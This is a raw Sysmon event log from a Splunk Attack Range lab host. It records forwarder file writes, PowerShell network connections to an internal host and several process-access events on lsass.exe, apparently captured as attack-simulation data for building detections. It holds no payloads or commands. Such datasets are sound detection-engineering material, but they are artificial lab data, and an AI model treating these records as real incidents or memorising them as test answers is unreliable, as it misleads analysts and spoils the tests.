AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:46.258{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48FBA94560BF8AF74F92A8452223CCF3,SHA256=53BC47CACBCD18FF142F8B5D61A8360BD3805D9EDF56CF9B1E2F20B7D7DA4003,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:10.166{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56487-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:46.055{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1B2E779410CBD0DD3279AD25C1EF99F,SHA256=A5BF7FE3D9605FFA3D47C1E63EBFC0317882171CEBAD6D377549E6FDAD5A4EDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:47.273{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6477349E68DA20A7318BA3E21FA42835,SHA256=39A7A3545E3B4091C6F336AC30410925BA8BF44F48D70E0E4C04B317459B7C74,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:48.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=168C0DB39AFF111947D63A1042015B3F,SHA256=D9EBFE067203A3CF4FC047D9E67677B4E0B118A834C0913310C8375053BE37A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:49.302{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=299C30C97EF3F650E2D8410437539639,SHA256=FDCD32C662E19E37CBC63E05FBA671D1F354EEF81C08979E9F051F733939218E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:50.317{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B999FCDF73570233BB90517B24DC7C9B,SHA256=C76B34BC202AEC3F73E0F8AD94FE34B183FC47ABE2C7FDF4BD445ED67C822E03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:50.233{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ECF12090A62E24ED8594774C49B390CA,SHA256=BC1D475AA5D9CC35C8C05BBEDF728E5B68DB24DEFCB01BC856E7F0469CB5F5F0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:51.352{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126049978818BC68BB8B3EC4BDFEEE18,SHA256=9B41D40EC34E0B23ED9FA7E1A7EE783A175FA3A33816A83E82180E3C66FBBE22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:15.184{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56489-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.262{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56488-false10.0.1.12-8000- 23542300x800000000000000035083532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:52.369{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BBD542FBF43DBA44FD763824BE9D9AF,SHA256=9E782F7BD5EB14C87AC06C041EED55205F08B5F0403B5128C375563349B94F00,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:53.400{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE7554D92A0B84CA1D6A1795C52BC2FB,SHA256=A4909CCE1243466585117EB7AB69F1607B8BCB94F77B49311488DA723AED9911,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:54.731{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:54.415{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93FDDEB26AE4C9C3E3BBE5F7EC0BE04A,SHA256=1EF649EDAE19B7D72AB6A4AB3F33E5A6B9533600DBE8427D48421F62C72CEC90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:55.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3541A011B759402DC8FC502046212006,SHA256=F2BC92081E9B1BFB8E5257FBF9020A5B2ACEE3A6B4DA8FF23DEF0175841BAA1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:55.431{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0609DC41E4215C05FF256244DD19C6B0,SHA256=4DED4750D58266FCB8AE90764429AAA1615507DE2DE485CA97F5D3ACA8A32724,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.599{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12F1F02422A1CB6FE6C6B08090318530,SHA256=806C9C80F599528BCFCD081FB661485B4CF1C837884483ED1874EC0AA464F75F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:20.195{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56491-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:20.158{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56490-false10.0.1.12-8000- 10341000x800000000000000035083568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.168{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.168{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.168{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.152{B81B27B7-4013-611D-1600-00000000C801}11965764C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1790-03000000C801}332C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+3ef6a|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.147{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1790-03000000C801}332C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.131{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4D04-613A-1790-03000000C801}332C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.131{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1790-03000000C801}332C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.115{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.115{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.115{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 